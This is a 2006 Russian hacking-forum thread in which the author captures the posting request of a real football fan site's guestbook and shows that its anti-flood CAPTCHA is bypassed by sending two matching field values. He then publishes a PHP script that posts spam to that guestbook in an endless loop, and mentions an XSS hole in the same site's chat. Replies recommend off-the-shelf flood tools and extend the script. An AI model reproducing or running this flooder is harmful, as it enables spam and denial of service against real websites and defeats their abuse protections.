Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Пишем простейший флудер гостевой [php] (https://forum.antichat.xyz/showthread.php?t=22491)

bul.666 11.08.2006 13:15
Пишем простейший флудер гостевой [php]
 
Нашел сайтец... http://peski.ru (ФК ЦСКА)

А вот она и Гостевая = http://www.peski.ru/gbook/

Есчо есть бажный Чат... Почти сразу нашел Активную XSS =) Но это совсем другая история... %)

В гостевой, чтобы оставлять сообщения нам нужно зарегистрироваться... Зарегестрировал себя я как lamer (А что нет?)...

В форме отправке сообщения используется метод POST, значит будем ловить пакет с помощью Naviscope (что это такое и где его взять думаю найдете). В двух словах же скажу, что это он отлавливает, все что нам приходит, и что мы отправляем браузеру... =)

Значит так отправляем им собщение типа "Привет друзья, отличный у вас сайт"... Или типа того, вообщем это не важно... Там, что инетересно есть исчо и антифлуд, типа введите число на картинке... Я уж думал, что это плохо, как оказалось нет =)))

Ввел число, нажал "Отправить". Бежим смотреть заголовки. Навископ выложил нам:

Цитата:
POST http://www.peski.ru/gbook/submitgb.php3 HTTP/1.0
Referer: http://www.peski.ru/gbook/form.php3
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.peski.ru
Content-Length: 160
Pragma: no-cache
Cookie: peskibook[name]=lamer; peskibook[email]=%40; peskibook[city]=%CC%EE%F1%EA%E2%E0; peskibook[country]=%D0%EE%F1%F1%E8%FF; peskibook[url]=http%3A%2F%2F; peskibook[password]=lamer; last_name=lamer;

Tname=lamer&Tpassword=lamer&Temail=@&Turl=http%3A% 2F%2F&Tcity=%CC%EE%F1%EA%E2%E0&Tcountry=%D0%EE%F1% F1%E8%FF&Tcoments=Привет Друзья&Tnumber=1397&Tdigitcode=1397
Разбирать детально не будем, вот, что нам понадобиться:

POST http://www.peski.ru/gbook/submitgb.php3 HTTP/1.0 - На какой скрипт и каким методом, мы будем отправлять

Referer: http://www.peski.ru/gbook/form.php3 - Реферер, откуда мы отправляем сообщение =)

Content-Type: application/x-www-form-urlencoded - Тип передоваемых данных

Host: www.peski.ru - собственно говоря и хост =)

Content-Length: 160 - Длинна передоваемых данных (в байтах)

Cookie: - Там же авторизация... =)

Tname=lamer&Tpassword=lamer&Temail=@&Turl=http%3A% 2F%2F&Tcity=%CC%EE%F1%EA%E2%E0&Tcountry=%D0%EE%F1% F1%E8%FF&Tcoments=Привет Друзья&Tnumber=1397&Tdigitcode=1397 - А вот это наши параметры... Все, что нужно нам для флудера =)

Из последней строки мы можем легко найти, где наше сообщение, имя изверя, пароль... Тут вот еще, что интересно: Tnumber и Tdigitcode... Это и есть их антифлуд?!
Тоесть мы просто ставим эти значения одинаковыми =)

Типерь пишем флудер... Я взял PHP лучше конечно будет перл, но пхп все больше знают, да и перл компилить не удобно =)

Не буду выводить по строчке и все объяснять выложи скрипт, а там разберемси:
PHP код:
<?php 
set_time_limit(9999999); //Чтобы скрипт работал бесконечно, в некоторых по умолчанию он работает 30 секунд, потом дохнет...
$id 1//гостевая не дает нам писать одинакововые сообщения поэтому просто будет добавляться в сообщение ейе ид, что еще дает нам проследить, скока сообщений мы отправили =)
$m "Hello World!"//Наше сообщение , желательно (Зенит чемпион) =) 
$login "lamer"//Логин
$pass "lamer"//Пароль
while(1//Делаем бесконечный цикл


$param "Tname=$login&Tpassword=$pass&Temail=@&Turl=http%3A%2F%2F&Tcity=%CC%EE%F1%EA%E2%E0&Tcountry=%D0%EE%F1%F1%E8%FF&Tcoments=$m($id)&Tnumber=1397&Tdigitcode=1397";
//Заголовки
$header="POST http://www.peski.ru/gbook/submitgb.php3 HTTP/1.0\r\n"
"Referer: http://www.peski.ru/gbook/form.php3\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Host: www.peski.ru\r\n"
"Content-Length: ".strlen($param)."\r\n"//Стрлен сразу передает длинну передоваемых парамтров... 
"Cookie: peskibook[name]=$login; peskibook[email]=%40; peskibook[city]=%CC%EE%F1%EA%E2%E0; peskibook[country]=%D0%EE%F1%F1%E8%FF; peskibook[url]=http%3A%2F%2F; peskibook[password]=$pass; last_name=$login\r\n\r\n".

$param
//Заголовки окончены

$sock=fsockopen("www.peski.ru",80); //Здесь можно еонектиться к прокику...
fputs($sock,$header); //Отправляем хосту наши заголовки
fclose($sock); //Закрываем хост
$id $id 1//Увеличиваем наш ид на один... 

?>
Скрипт написан для того, чтобы просто представить себе алгоритм флудеров... Ссылку указана для теста... Уверен Админы, скоро прикроют это =)

em00s7 11.08.2006 14:07
Ф топку безконечный цикл-)))

Sn@k3 11.08.2006 14:17
ИМХО, можно заюзать inetcrack или Denyou

bul.666 11.08.2006 14:19
Цитата:
Сообщение от Sn@k3
ИМХО, можно заюзать inetcrack или Denyou
Конечно можно... А что то делать своими ручками тоже учиться надо

em00s7 11.08.2006 14:37
имно на php можно написать спамелку , да и не только .. -)) а инет кряком....-)))

Trinux 11.08.2006 16:27
вообще из спецификации http, ты должен не только отправить запрос, но и дождаться ответа. Т.е. если рассуждать логически, твой скрипт работать не будет =))) Соответвтвенно, работать он будет, т.к. спецификации приято "доробатывать" у программеров серверного по. Но все равно данный скрипт ошибочный

em00s7 11.08.2006 16:34
while (!feof($fp))
{
$k = fgets($fp, 1024);
}
echo "ответ сервака $k";
Допиши

Ch3ck 11.08.2006 16:43
А где, то я похожее читал...только аттакуемый сайт был другой... или у меня дежавю?!

em00s7 11.08.2006 16:47
Dr.Check таких скриптов полно в инэте так что в полне возможно...-)


Время: 05:46